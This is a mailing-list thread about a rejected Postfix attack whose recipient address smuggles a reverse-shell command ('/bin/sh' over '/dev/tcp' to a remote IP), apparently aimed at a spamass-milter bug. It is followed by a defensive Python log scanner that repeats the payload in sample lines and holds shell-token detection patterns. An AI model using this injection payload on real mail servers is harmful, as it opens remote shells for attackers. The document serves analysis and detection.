On 12.02.2011 22:53, Bob Proulx wrote:
> A friend's Mac running Postfix logged this rejected attack:
>
> Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from
> unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need
> fully-qualified hostname; from=<b...@dick.com> to=<root+:|exec /bin/sh
> 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>
>
> Of course this particular message was blocked at the HELO stage. But
> I was curious as to what attack vector this was trying to exploit and
> against what mail transport agent? I searched the web quite a bit and
> didn't see this particular attack discussed anywhere.
>
> Obviously the /dev/tcp/host/port part is trying to connect back to a
> C&C host and attach the network connection to a root shell. I
> understand the shell scripting part of the attack fine.
>
> The remote MTA security exploit I couldn't locate references to was
> the "to=<root+:|exec /bin/sh ..." part of the attack. What MTA is
> vulnerable to "+:|" in the To address? Or perhaps none are and this
> is simply a failed probe attempt?
>
> Thanks,
> Bob
Looks like it is trying an already fixed bug in spamass-milter: http://savannah.nongnu.org/bugs/?29136

-- 
Best Regards
MfG
Robert Schetterer
Germany/Munich/Bavaria
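As an added example from the defender's side (this is not code from the thread or from any of the projects mentioned), the following Python scans Postfix smtpd reject lines for recipient addresses that carry shell metacharacters or command fragments of the kind quoted above, so that such probes can be spotted in logs even when the HELO check already rejected them. The sample log lines are constructed with RFC 5737 documentation addresses and modeled on the one in the thread; the function names and the heuristics are assumptions of this example, not a published rule set.

```python
"""Flag Postfix smtpd reject lines whose recipient address looks like a shell command.

Added example for log review; the sample lines below are constructed and use
RFC 5737 documentation addresses, not real traffic.
"""
from __future__ import annotations

import re

# Shape of a Postfix smtpd "NOQUEUE: reject: RCPT from ..." line. The recipient is
# matched non-greedily up to "> proto=" because an injected payload may itself
# contain '>' characters (redirections), as in the thread's log line.
_REJECT_RE = re.compile(
    r"postfix/smtpd\[\d+\]: NOQUEUE: reject: RCPT from "
    r"(?P<client>\S+?)\[(?P<ip>[^\]]+)\]: (?P<code>\d{3}) .*?"
    r"from=<(?P<sender>[^>]*)> to=<(?P<rcpt>.*?)> proto=(?P<proto>\S+) helo=<(?P<helo>[^>]*)>"
)

# Characters that are not legal in an unquoted address (RFC 5322 atext plus '.' and '@').
# Spaces, ':', '<', '>' and ';' cannot appear there without quoting.
_NON_ATEXT = re.compile(r"[^A-Za-z0-9!#$%&'*+\-/=?^_`{|}~.@]")

# Tokens that only make sense if the local part is being fed to a shell.
_SHELL_HINTS = re.compile(r"/dev/(?:tcp|udp)/|/bin/(?:ba)?sh\b|\bexec\b|\|\s*\S|\$\(|`")

# Constructed sample lines (hypothetical hosts, RFC 5737 addresses).
SAMPLE_LINES = [
    "Feb 11 21:40:02 mailer postfix/smtpd[3701]: NOQUEUE: reject: RCPT from "
    "unknown[192.0.2.10]: 450 4.1.8 <joe@example.invalid>: Sender address rejected: "
    "Domain not found; from=<joe@example.invalid> to=<alice@example.net> "
    "proto=ESMTP helo=<mx.example.invalid>",
    "Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from "
    "unknown[192.0.2.55]: 504 5.5.2 <bluedick>: Helo command rejected: need "
    "fully-qualified hostname; from=<b@example.invalid> "
    "to=<root+:|exec /bin/sh 0</dev/tcp/203.0.113.7/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>",
    "Feb 11 21:45:40 mailer postfix/smtpd[3709]: NOQUEUE: reject: RCPT from "
    "mail.example.org[192.0.2.77]: 554 5.7.1 <root+bounces@example.net>: Relay access "
    "denied; from=<list@example.org> to=<root+bounces@example.net> proto=ESMTP helo=<mail.example.org>",
    "Feb 11 21:46:00 mailer postfix/smtpd[3708]: disconnect from unknown[192.0.2.55]",
]


def parse_reject(line: str) -> dict[str, str] | None:
    """Return the fields of a smtpd RCPT reject line, or None for other log lines."""
    m = _REJECT_RE.search(line)
    return m.groupdict() if m else None


def suspicious_recipient(rcpt: str) -> list[str]:
    """Return human-readable reasons why a recipient looks like a shell payload (empty if clean)."""
    reasons: list[str] = []
    bad_chars = sorted(set(_NON_ATEXT.findall(rcpt)))
    if bad_chars:
        reasons.append("characters not legal in an unquoted address: " + repr("".join(bad_chars)))
    hints = sorted({h.strip() for h in _SHELL_HINTS.findall(rcpt)})
    if hints:
        reasons.append("shell-command tokens: " + ", ".join(hints))
    return reasons


def scan(lines: list[str]) -> list[dict[str, object]]:
    """Parse each line and keep only rejects whose recipient is suspicious."""
    findings = []
    for line in lines:
        fields = parse_reject(line)
        if fields is None:
            continue
        reasons = suspicious_recipient(fields["rcpt"])
        if reasons:
            findings.append(
                {"ip": fields["ip"], "sender": fields["sender"], "rcpt": fields["rcpt"], "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"{f['ip']} -> {f['rcpt']!r}")
        for r in f["reasons"]:
            print("    " + r)
```

The plus-addressed recipient `root+bounces@example.net` in the third sample is deliberately left unflagged: `+` sub-addressing is legitimate and common, and what distinguishes the probe is the unquoted `:`, the space, the redirections and the `/dev/tcp` path, not the `+` itself.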